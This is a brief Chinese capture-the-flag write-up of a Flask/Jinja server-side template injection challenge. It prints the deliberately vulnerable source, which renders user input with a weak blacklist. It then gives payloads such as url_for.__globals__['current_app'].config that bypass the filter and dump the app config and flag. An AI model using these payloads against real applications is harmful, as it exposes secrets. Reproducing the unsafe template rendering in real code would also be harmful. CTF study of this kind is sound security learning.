打开网页是一题代码审计
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
题目中存在着两个路由,第一个是展示源代码,另一个是在/shrine/路径下提交参数,通过模板{{}}设定的参数提交到后端,没错,这就是模板注入。先尝试输入参数{{7*7}}
因为config和self被过滤所以没法直接看
如果没有黑名单的时候,我们可以使用config,传入 config,或者使用self传入 {{self.dict}}
但是python中还是存在着一些内置函数的比如url_for和get_flashed_messages
利用payload找到当前使用的app
shrine%2f{{url_for.__globals__}}
读取当前app下config得到flag
/shrine/{{url_for.__globals__['current_app'].config}}
flag:
flag{50ec3157-e116-4b8d-8fe0-75510f45657f}